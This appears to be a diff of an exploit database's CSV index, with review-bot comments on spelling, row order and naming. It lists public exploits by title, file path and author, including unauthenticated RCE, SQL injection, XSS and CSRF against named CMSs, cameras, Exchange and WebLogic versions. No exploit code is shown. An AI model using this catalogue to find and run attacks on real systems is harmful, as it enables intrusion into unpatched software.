49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,ChendoChap,webapps,hardware, 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,ChendoChap,webapps,hardware,
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",1970-01-01,Mosaaed,webapps,php, 49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",1970-01-01,Mosaaed,webapps,php,
49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting",1970-01-01,boku,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",1970-01-01,"Matthew Aberegg",webapps,php, 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",1970-01-01,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",1970-01-01,"Musyoka Ian",webapps,php, 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",1970-01-01,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",1970-01-01,"Kislay Kumar",webapps,php, 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",1970-01-01,"Kislay Kumar",webapps,php,
@ -43776,6 +43807,7 @@ id,file,description,date,author,type,platform,port
49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",1970-01-01,SunCSR,webapps,php, 49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",1970-01-01,SunCSR,webapps,php,
49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",1970-01-01,"Bedri Sertkaya",webapps,php, 49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",1970-01-01,"Bedri Sertkaya",webapps,php,
49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",1970-01-01,B3KC4T,webapps,php, 49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",1970-01-01,B3KC4T,webapps,php,
49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting",1970-01-01,"Mesut Cetin",webapps,multiple,
49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Rahul Ramakant Singh",webapps,php, 49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Rahul Ramakant Singh",webapps,php,
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",1970-01-01,MoeAlBarbari,webapps,multiple, 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",1970-01-01,MoeAlBarbari,webapps,multiple,
49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,php, 49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,php,
@ -43835,8 +43867,10 @@ id,file,description,date,author,type,platform,port
49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",1970-01-01,LiquidWorm,webapps,hardware, 49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",1970-01-01,LiquidWorm,webapps,hardware,
49459,exploits/hardware/webapps/49459.txt,"Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java, 49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java,
49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php, 49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple, 49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple, 49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple,
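Review bot: the new 49459 row names the product "Selea Targa 512 IP OCR-ANPR Camera" while the surrounding 49456 to 49460 rows all use "Selea Targa IP OCR-ANPR Camera"; if the 512 model qualifier is deliberate (the stream disclosure applies to that model only) keep it, otherwise align the description so the Selea entries group together in searches. The added 49462 row follows the same format as 49463 beside it.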
@ -43920,6 +43954,7 @@ id,file,description,date,author,type,platform,port
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php, 49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting",1970-01-01,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php, 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php, 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php, 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php,
@ -43969,6 +44004,7 @@ id,file,description,date,author,type,platform,port
49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple, 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple,
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware,
49711,exploits/php/webapps/49711.py,"Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",1970-01-01,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php, 49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php, 49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php,
@ -44014,6 +44050,7 @@ id,file,description,date,author,type,platform,port
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple, 49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple, 49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware, 49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware,
49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple, 49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple,
49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php, 49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php,
@ -44026,6 +44063,7 @@ id,file,description,date,author,type,platform,port
49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware, 49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware,
49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,
49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple, 49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple,
49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple, 49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple,
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php, 49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php,
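Review bot: not part of this change, but the unchanged 49791 row in this hunk reads "Service Side Request Forgery (SSRF)"; the expansion of SSRF is Server-Side Request Forgery, worth correcting while this region is touched. The added 49788 row (GravCMS 1.10.7, `.rb`, Metasploit) is consistent with the other Metasploit rows on the page such as 49435 and 40091.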
@ -44033,19 +44071,34 @@ id,file,description,date,author,type,platform,port
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware, 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
50462,exploits/aspx/webapps/50462.txt,"Umbraco v8.14.1 - 'baseUrl' SSRF",1970-01-01,NgoAnhDuc,webapps,aspx,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php, 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php,
49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php, 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php,
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",1970-01-01,"Leonardo Paiva",webapps,php,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php, 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php, 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php,
49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",1970-01-01,"Syed Sheeraz Ali",webapps,php, 49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",1970-01-01,"Syed Sheeraz Ali",webapps,php,
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",1970-01-01,nu11secur1ty,webapps,php, 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",1970-01-01,nu11secur1ty,webapps,php,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",1970-01-01,4D0niiS,webapps,ruby, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",1970-01-01,4D0niiS,webapps,ruby, 49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",1970-01-01,argenestel,webapps,php,
49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",1970-01-01,strider,webapps,php, 49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",1970-01-01,strider,webapps,php,
49826,exploits/multiple/webapps/49826.js,"Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting",1970-01-01,"Taurus Omar",webapps,multiple,
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49831,exploits/multiple/webapps/49831.js,"Marky 0.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49833,exploits/multiple/webapps/49833.js,"Freeter 1.2.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",1970-01-01,"Emircan Baş",webapps,multiple, 49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",1970-01-01,"Emircan Baş",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",1970-01-01,"Eren Saraç",webapps,multiple, 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",1970-01-01,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",1970-01-01,h4shur,webapps,php, 49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",1970-01-01,h4shur,webapps,php,
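Review bot: row 50462 (Umbraco SSRF) is inserted between 49800 and 49801, breaking the ascending ID order that the surrounding rows follow; move it to its place among the 504xx entries. The description on row 49823 is also missing the space before "(Unauthenticated)", unlike the other rows in this hunk.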
@ -44072,6 +44125,8 @@ id,file,description,date,author,type,platform,port
49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",1970-01-01,"Vani K G",webapps,php, 49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",1970-01-01,"Vani K G",webapps,php,
49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",1970-01-01,"Mohammad Koochaki",webapps,php, 49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",1970-01-01,"Mohammad Koochaki",webapps,php,
49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Abdulkadir AYDOGAN",webapps,php, 49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Abdulkadir AYDOGAN",webapps,php,
49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",1970-01-01,"Fellipe Oliveira",webapps,php,
49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection",1970-01-01,bwnz,webapps,php,
49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",1970-01-01,"Dimitrios Mitakos",webapps,php, 49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",1970-01-01,"Dimitrios Mitakos",webapps,php,
49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",1970-01-01,"Gonzalo Villegas",webapps,windows, 49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",1970-01-01,"Gonzalo Villegas",webapps,windows,
49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,php, 49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,php,
@ -44082,6 +44137,7 @@ id,file,description,date,author,type,platform,port
49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",1970-01-01,"Mansoor R",webapps,php, 49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",1970-01-01,"Mansoor R",webapps,php,
49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",1970-01-01,mekhalleh,webapps,windows, 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",1970-01-01,mekhalleh,webapps,windows,
49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)",1970-01-01,"Emir Polat",webapps,multiple,
49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Marek Toth",webapps,java, 49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Marek Toth",webapps,java,
49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Ron Jost",webapps,multiple, 49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Ron Jost",webapps,multiple,
49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",1970-01-01,"Bastijn Ouwendijk",webapps,php, 49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",1970-01-01,"Bastijn Ouwendijk",webapps,php,
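Review bot: the description on row 49897 misspells "Arbitary"; it should read "Schlix CMS 2.2.6-6 - Arbitrary File Upload (Authenticated)" to match the spelling used on the other file-upload rows.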
@ -44094,6 +44150,7 @@ id,file,description,date,author,type,platform,port
49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,php, 49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,php,
49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php, 49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",1970-01-01,"Ron Jost",webapps,php, 49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",1970-01-01,"Ron Jost",webapps,php,
49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",1970-01-01,"Jon Stratton",webapps,linux,
